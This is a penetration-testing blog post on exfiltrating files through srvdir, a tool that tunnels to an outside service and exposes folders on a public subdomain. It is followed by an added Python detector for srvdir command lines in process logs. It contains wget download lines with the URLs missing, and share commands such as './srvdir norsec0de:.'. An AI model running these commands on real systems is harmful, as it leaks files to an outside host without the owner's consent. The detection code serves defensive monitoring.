data exfiltration over SSL with srvdir

Every now and then I come across some application that may or may not have been developed with penetration testing in mind but it ends up being damn helpful all the same. Yesterday I found a post about ‘srvdir’ (surv~durr?) which is designed to share content over SSL/TLS via a public site.

When trying to exfiltrate data from a client site I normally spend a lot of time setting up tunnels, using disposable A records from and one of my boxes in some east-european cave just so I can get the damn ‘payroll-summary-june-2014.pdf’ trophy off some box that is swimming in ssh-tunnel-fu. srvdir is the perfect answer to this problem and testing it has been awesome and full of those “Why didn’t I think of this?!!” rants.

Essentially, what srvdir does is create an SSL tunnel to the mothership ‘’ and issue a subdomain that can be accessed externally to siphon the files off. Grabbing files is relatively painless, with the odd 404 for the permission snobs. It supports basic HTTP auth for the paranoid and, by the looks of it, tokens as well. It runs seamlessly on Windows, Linux and OSX and is relatively small.

To get the file, use wget:

wget.exe --no-check-certificate

wget --no-check-certificate

wget --no-check-certificate

Unzip the file:

./srvdir -h

./srvdir [-auth="username:password"] subdomain:path

Share current folder with custom subdomain
./srvdir norsec0de:.

Share current folder with random subdomain
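
On the defending side, the usage line above is enough to pick srvdir out of process-creation logs. The following is an added example, not part of the original post or of srvdir itself: it parses command lines against the [-auth=...] subdomain:path form and reports each shared path and whether it is password-protected. The hosts, command lines and finding labels are constructed for this example.

```python
import re

# Constructed process-creation events (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("ws-014", "./srvdir norsec0de:."),
    ("ws-014", './srvdir -auth="user:pass" docs:/home/bob/payroll'),
    ("fs-002", r"C:\Temp\srvdir.exe -h"),
    ("ws-020", "wget --no-check-certificate https://downloads.example.invalid/tool.zip"),
    ("ws-021", "ls -la /srv/dir:old"),
]

# Binary name as the last path component, on Linux/OSX or Windows.
BINARY = re.compile(r"(^|[\\/])srvdir(\.exe)?$", re.IGNORECASE)
# The subdomain:path argument from the usage line.
SHARE = re.compile(r"^(?P<subdomain>[A-Za-z0-9-]+):(?P<path>.+)$")


def parse_srvdir(cmdline):
    """Return auth flag and shares if cmdline is a srvdir invocation, else None."""
    argv = cmdline.split()  # simplification: paths containing spaces are not handled
    if not argv or not BINARY.search(argv[0]):
        return None
    flags = [a.lstrip("-") for a in argv[1:] if a.startswith("-")]
    shares = []
    for arg in argv[1:]:
        m = None if arg.startswith("-") else SHARE.match(arg)
        if m:
            shares.append((m["subdomain"], m["path"]))
    return {"auth": any(f.startswith("auth=") for f in flags), "shares": shares}


def detect(events):
    """Return (host, finding, subdomain, path) tuples for every srvdir event."""
    findings = []
    for host, cmdline in events:
        parsed = parse_srvdir(cmdline)
        if parsed is None:
            continue
        if not parsed["shares"]:
            findings.append((host, "srvdir-executed", None, None))
        kind = "share-with-auth" if parsed["auth"] else "share-unauthenticated"
        for subdomain, path in parsed["shares"]:
            findings.append((host, kind, subdomain, path))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Name-based matching only catches copies that keep the srvdir file name, so treat it as one signal alongside egress monitoring.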

keep hacking
